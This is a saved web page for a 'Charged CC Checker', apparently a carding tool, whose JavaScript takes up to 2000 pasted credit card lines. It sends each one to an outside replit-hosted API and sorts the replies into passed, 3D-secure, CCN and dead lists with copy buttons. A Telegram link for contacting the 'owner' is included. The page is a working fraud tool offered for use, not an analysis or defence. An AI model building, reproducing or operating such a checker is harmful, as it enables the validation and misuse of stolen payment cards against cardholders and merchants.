<!DOCTYPE html>
<html class="loading">


<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0, minimal-ui">
	<title>Charged Checker</title>
	<link rel='icon' href='https://raw.githubusercontent.com/RISHAB-CREATOR/ItzRishabTools/main/icons/icon_64.png'>
	<link href="https://fonts.googleapis.com/css?family=Muli:300,300i,400,400i,600,600i,700,700i%7CComfortaa:300,400,700" rel="stylesheet">
	<link href="../stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
	<link rel="stylesheet" type="text/css" href="theme-assets/css/vendors.css">
	<link rel="stylesheet" type="text/css" href="theme-assets/css/app-lite.css">
	<link rel="stylesheet" type="text/css" href="theme-assets/css/core/menu/menu-types/vertical-menu.css">
	<link rel="stylesheet" type="text/css" href="theme-assets/css/core/colors/palette-gradient.css">
	<script src="https://cdn.jsdelivr.net/npm/sweetalert2@9"></script>
</head>

<body class="vertical-layout" data-color="#">
	<div class="app-content content">
		<div class="content-wrapper">
			<div class="content-wrapper-before mb-3">
			</div>
			<div class="content-body">
				<div class="mt-2"></div>
				<div class="row">
					<div class="col-md-8">
						<div class="card">
							<div class="card-body text-center">
								<h2 class="mb-2 neon-container"><strong><b>Rishab Charged CC Checker</b></strong></h2>

								<a class="nav-link btn-glow btn-bg-gradient-x-blue-cyan text-white" style="width: 100%; float: left;" href="https://t.me/alternatingperspire">TO CONTACT OWNER CLICK HERE</a>
								<textarea rows="12" class="form-control text-center form-checker mb-2" placeholder="Pαʂƚҽ Yσυɾ CC'ʂ Hҽɾҽ"></textarea>
								<!-- <textarea rows="1" class="form-control text-center placeholder-styled" style="background-color: #87CEEB;color: black; width: 100%; float: left ;margin-bottom: 7px;" id="sec" placeholder="IP:PORT:USERNAME:PASS"></textarea> -->
								<select style="background-color: #1D1D1D;;" name=" gate" id="gate" class="form-control neon-container" style="margin-bottom: 5px;" <option </option>
									<option style="background-color: #1D1D1D;" value="1-shopify.html">Premium GATE ( 1$ )</option>
								</select>
								<br>
								<button class="btn btn-play btn-glow btn-bg-gradient-x-blue-cyan text-white" style="width: 49%; float: left;"><i class="fa fa-play"></i>START</button>
								<button class="btn btn-stop btn-glow btn-bg-gradient-x-red-pink text-white" style="width: 49%; float: right;" disabled><i class="fa fa-stop"></i>STOP</button>


								<style>
									.neon-container {
										color: #FFFFFF;
										padding: 20px;
										text-shadow: 0 0 5px #FFFF00;
									}

									.placeholder-styled::placeholder {
										color: #141414;
										font-style: bold;
									}
								</style>
							</div>
						</div>
					</div>
					<div class="col-md-4">
						<div class="card mb-2">
							<div class="card-body">

								<h5>TOTAL :<span class="badge badge-primary float-right carregadas">0</span></h5>
								<hr>

								<h5>PASSED :<span class="badge badge-success float-right charge">0</span></h5>
								<hr>

								<h5>FAILED :<span class="badge badge-danger float-right reprovadas">0</span></h5>
								<hr>




							</div>
						</div>
					</div>
					<div class="col-xl-12">
						<div class="card">
							<div class="card-body">
								<div class="float-right">
									<button type="show" class="btn btn-primary btn-sm show-charge"><i class="fa fa-eye-slash"></i></button>
									<button class="btn btn-success btn-sm btn-copy1"><i class="fa fa-copy"></i></button>
								</div>
								<h4 class="card-title mb-1"><i class="fa fa-check-circle text-success"></i> Authenticate Successful</h4>
								<div id='lista_charge'></div>
							</div>
						</div>
					</div>
					<div class="col-xl-12">
						<div class="card">
							<div class="card-body">
								<div class="float-right">
									<button type='hidden' class="btn btn-primary btn-sm show-dies"><i class="fa fa-eye"></i></button>
									<button class="btn btn-danger btn-sm btn-trash"><i class="fa fa-trash"></i></button>
								</div>
								<h4 class="card-title mb-1"><i class="fa fa-times text-danger"></i> Authenticate Failed</h4>
								<div style='display: none;' id='lista_reprovadas'></div>
							</div>
						</div>
					</div>

					</section>
				</div>
			</div>
		</div>

		<script src="theme-assets/js/core/libraries/jquery.min.js" type="text/javascript"></script>

		<body class="vertical-layout" style="background-color:#141414;" data-color="bg-gradient-x-purple-blue">
			<style>
				h5,
				h4 {
					color: white;
				}

				.text-center {
					background-color: #2C2C2C;
					border: 1px solid #525252;
					border-radius: 5px;
					font-family: 'Bebas Neue', cursive;
					letter-spacing: 2px;
				}

				textarea {
					color: white;
					resize: none;
				}

				.text-center::placeholder {
					color: grey;
				}

				.text-center:focus {
					background-color: #2C2C2C;
				}

				textarea::-webkit-scrollbar {
					width: 5px;
					background-color: #112132;
				}

				textarea::-webkit-scrollbar-thumb {
					border-radius: 10px;
					background-color: #2e4964;
				}

				.lista_reprovadass {
					color: #747474;
				}

				.card-body {
					background-color: #1D1D1D;
					border-radius: 5px;
				}

				.text-center {
					border: none;
				}

				.badge-success,
				.btn-success {
					background-color: #5ed84f;
					color: black;
					border: none;
				}

				.btn-success:hover {
					background-color: #28af17;
					border: none;
					color: black;
					shadow: hidden;
				}

				.aprovadas {
					background-color: #35a7ff;
					color: black;
				}

				.badge-danger {
					background-color: #ff1b23;
					color: black;
				}

				.html body .content .content-wrapper {
					background-color: #112132;
				}

				.btn-bg-gradient {
					background-image: linear-gradient(to right, #1FA2FF 0%, #12D8FA 51%, #1FA2FF 100%);
					margin: 5px;
					width: 49%;
					padding: 12px 40px;
					text-align: center;
					text-transform: uppercase;
					transition: 0.5s;
					background-size: 200% auto;
					color: white;
					box-shadow: 0 0 20px #eee;
					border-radius: 5px;
					display: block;
					-webkit-box-shadow: 0 0 0 0 #514a9d;
					font-family: 'Fjalla One', sans-serif;
					letter-spacing: 2px;
				}

				.btn-bg-gradient:hover {
					background-position: right center;
					color: #fff;
					text-decoration: none;
				}

				.btn-bg-gradient-x {
					background-image: linear-gradient(to right, #CB356B 0%, #BD3F32 51%, #CB356B 100%);
					margin: 5px;
					padding: 12px 45px;
					cursor: pointer;
					text-align: center;
					text-transform: uppercase;
					transition: 0.5s;
					background-size: 200% auto;
					color: white;
					box-shadow: 0 0 20px #eee;
					border-radius: 5px;
					display: block;
					-webkit-box-shadow: 0 0 0 0 #514a9d;
					font-family: 'Fjalla One', sans-serif;
					letter-spacing: 2px;
				}

				.btn-bg-gradient-x:hover {
					background-position: right center;
					color: #fff;
					text-decoration: none;
				}

				.statusbar {
					height: 320px;
					padding-top: 50px;
				}

				.hr-statusbar {
					border: none;
					height: 1px;
					background-image: linear-gradient(to right, #007fa9, #25289e);
				}

				.footer-C {
					color: white;
					text-align: center;
					font-family: 'Bebas Neue', cursive;
					font-size: 17px;
					letter-spacing: 1px;
				}
			</style>
			<div class="app-content content" style="display:block;">
				<div class="content-wrapper" style="background-color:#141414;">
					<footer>
						<p><a href="https://t.me/alternatingperspire"></a></p>
					</footer>
					<script>
						$(document).ready(function() {


							const swalWithBootstrapButtons = Swal.mixin({
								customClass: {
									confirmButton: 'btn btn-success',
									cancelButton: 'btn btn-danger'
								},
								buttonsStyling: false
							})



							function RedirectUrl() {
								window.location.href = "https://t.me/alternatingperspire";
							}

							$('.show-charge').click(function() {
								var type = $('.show-charge').attr('type');
								$('#lista_charge').slideToggle();
								if (type == 'show') {
									$('.show-charge').html('<i class="fa fa-eye"></i>');
									$('.show-charge').attr('type', 'hidden');
								} else {
									$('.show-charge').html('<i class="fa fa-eye-slash"></i>');
									$('.show-charge').attr('type', 'show');
								}
							});

							$('.show-live').click(function() {
								var type = $('.show-live').attr('type');
								$('#lista_cvvs').slideToggle();
								if (type == 'show') {
									$('.show-live').html('<i class="fa fa-eye"></i>');
									$('.show-live').attr('type', 'hidden');
								} else {
									$('.show-live').html('<i class="fa fa-eye-slash"></i>');
									$('.show-live').attr('type', 'show');
								}
							});

							$('.show-lives').click(function() {
								var type = $('.show-lives').attr('type');
								$('#lista_aprovadas').slideToggle();
								if (type == 'show') {
									$('.show-lives').html('<i class="fa fa-eye"></i>');
									$('.show-lives').attr('type', 'hidden');
								} else {
									$('.show-lives').html('<i class="fa fa-eye-slash"></i>');
									$('.show-lives').attr('type', 'show');
								}
							});

							$('.show-dies').click(function() {
								var type = $('.show-dies').attr('type');
								$('#lista_reprovadas').slideToggle();
								if (type == 'show') {
									$('.show-dies').html('<i class="fa fa-eye"></i>');
									$('.show-dies').attr('type', 'hidden');
								} else {
									$('.show-dies').html('<i class="fa fa-eye-slash"></i>');
									$('.show-dies').attr('type', 'show');
								}
							});

							$('.btn-trash').click(function() {
								var audio = new Audio('jail2.mp3');
								audio['play']();
								Swal.fire({
									title: 'REMOVED DEAD',
									icon: 'success',
									showConfirmButton: false,
									toast: true,
									position: 'top-end',
									timer: 3000
								});
								$('#lista_reprovadas').text('');
							});

							$('.btn-copy1').click(function() {
								var audio = new Audio('jail2.mp3');
								audio['play']();
								Swal.fire({
									title: 'COPIED PASSED CCS',
									icon: 'success',
									showConfirmButton: false,
									toast: true,
									position: 'top-end',
									timer: 3000
								});
								var lista_charge = document.getElementById('lista_charge').innerText;
								var textarea = document.createElement("textarea");
								textarea.value = lista_charge;
								document.body.appendChild(textarea);
								textarea.select();
								document.execCommand('copy');
								document.body.removeChild(textarea);
							});

							$('.btn-copy2').click(function() {
								Swal.fire({
									title: 'COPIED CVV',
									icon: 'success',
									showConfirmButton: false,
									toast: true,
									position: 'top-end',
									timer: 3000
								});
								var lista_live = document.getElementById('lista_cvvs').innerText;
								var textarea = document.createElement("textarea");
								textarea.value = lista_live;
								document.body.appendChild(textarea);
								textarea.select();
								document.execCommand('copy');
								document.body.removeChild(textarea);
							});

							$('.btn-copy').click(function() {
								Swal.fire({
									title: 'COPIED CCN',
									icon: 'success',
									showConfirmButton: false,
									toast: true,
									position: 'top-end',
									timer: 3000
								});
								var lista_lives = document.getElementById('lista_aprovadas').innerText;
								var textarea = document.createElement("textarea");
								textarea.value = lista_lives;
								document.body.appendChild(textarea);
								textarea.select();
								document.execCommand('copy');
								document.body.removeChild(textarea);
							});


							$('.btn-play').click(function() {
								var audio = new Audio('jail.mp3');
								audio['play']();
								var sec = $("#sec").val();
								var cs = $("#cs").val();
								var pk = $("#pk").val();
								var amt = $("#amt").val();
								var mail = $("#mail").val();
								var cst = $("#cst").val();
								var e = document.getElementById("gate");
								var gate = e.options[e.selectedIndex].value;
								var lista = $('.form-checker').val().trim();
								var array = lista.split('\n');
								var charge = 0,
									live = 0,
									lives = 0,
									dies = 0,
									testadas = 0,
									txt = '';

								if (!lista) {
									Swal.fire({
										title: 'You did not provide a card :(',
										icon: 'error',
										showConfirmButton: false,
										toast: true,
										position: 'top-end',
										timer: 3000
									});
									return false;
								}
								Swal.fire({
									title: 'Your cards are being checked...',
									icon: 'success',
									showConfirmButton: false,
									toast: true,
									position: 'top-end',
									timer: 3000
								});

								var line = array.filter(function(value) {
									if (value.trim() !== "") {
										txt += value.trim() + '\n';
										return value.trim();
									}
								});
								var total = line.length;
								$('.form-checker').val(txt.trim());
								if (total > 2000) {
									Swal.fire({
										title: 'YOU CAN NOT PERFORM THAT ACTION: REDUCE NUMBER OF CARDS TO =< 2000',
										icon: 'warning',
										showConfirmButton: false,
										toast: true,
										position: 'top-end',
										timer: 3000
									});
									return false;
								}

								var stopChecking = false;
								$('.btn-stop').click(function() {
									Swal.fire({
										title: 'PAUSED',
										icon: 'warning',
										showConfirmButton: false,
										toast: true,
										position: 'top-end',
										timer: 3000
									});
									$('.btn-play').attr('disabled', false);
									$('.btn-stop').attr('disabled', true);
									stopChecking = true;
									return false;
								});
								$('.carregadas').text(total);
								$('.btn-play').attr('disabled', true);
								$('.btn-stop').attr('disabled', false);
								for (let index = 0; index < line.length; index++) {

									setTimeout(function() {
										if (stopChecking) {
											return;
										}
										var callBack = $.ajax({
											// url: gate + '?lista=' + data + '&sec=' + sec + '&cst=' + cst,
											url: decodeURIComponent('https://vbv-api.jonasleo.repl.co/api?lista=' + line[index]),
											success: function(retorno) {
												if (retorno.indexOf("PASSED") >= 0) {
													$('#lista_charge').append(retorno + '<br>');
													removelinha();
													charge = charge + 1;
													document.getElementById('lista_charge').style = "color: green; text-shadow: 0 0 10px lime;";
												} else if (retorno.indexOf("3D") >= 0) {
													$('#lista_cvvs').append(retorno + '<br>');
													removelinha();
													live = live + 1;
													document.getElementById('lista_cvvs').style = "color: yellow; text-shadow: 0 0 10px yellow;";
												} else if (retorno.indexOf("CCN") >= 0) {
													$('#lista_aprovadas').append(retorno + '<br>');
													removelinha();
													lives = lives + 1;
													document.getElementById('lista_aprovadas').style = "color: blue; text-shadow: 0 0 10px royalblue;";
												} else {
													$('#lista_reprovadas').append(retorno + '<br>');
													removelinha();
													dies = dies + 1;
													document.getElementById('lista_reprovadas').style = "color: red; text-shadow: 0 0 10px red;";
												}
												testadas = charge + live + lives + dies;
												$('.charge').text(charge);
												$('.cvvs').text(live);
												$('.aprovadas').text(lives);
												$('.reprovadas').text(dies);
												$('.testadas').text(testadas);

												if (testadas == total) {
													Swal.fire({
														title: 'ALL CARDS HAS BEEN CHECKED',
														icon: 'success',
														showConfirmButton: false,
														toast: true,
														position: 'top-end',
														timer: 3000
													});
													$('.btn-play').attr('disabled', false);
													$('.btn-stop').attr('disabled', true);
												}
											}
										});
									}, 2000 * index);
								}
							});
						});

						function removelinha() {
							var lines = $('.form-checker').val().split('\n');
							lines.splice(0, 1);
							$('.form-checker').val(lines.join("\n"));
						}
					</script>

		</body>


<!-- Mirrored from apivbv-bruter.predator783.repl.co/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 28 Jul 2023 09:09:35 GMT -->
</html>
